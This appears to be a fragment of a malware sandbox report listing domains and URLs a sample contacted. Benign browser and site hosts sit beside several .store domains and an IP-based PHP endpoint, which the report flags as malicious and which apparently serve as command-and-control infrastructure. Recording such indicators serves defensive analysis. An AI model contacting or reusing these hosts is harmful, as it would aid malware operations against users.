telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
presticitpo.store unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
fadehairucw.store unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
thumbystriw.store unknown unknown
shavar.services.mozilla.com unknown unknown
crisiwarny.store unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ true
    		unknown
    fadehairucw.store true
      		unknown
      http://185.215.113.206/6c4adf523b719729.php true
        		unknown
        founpiuer.store true
          		unknown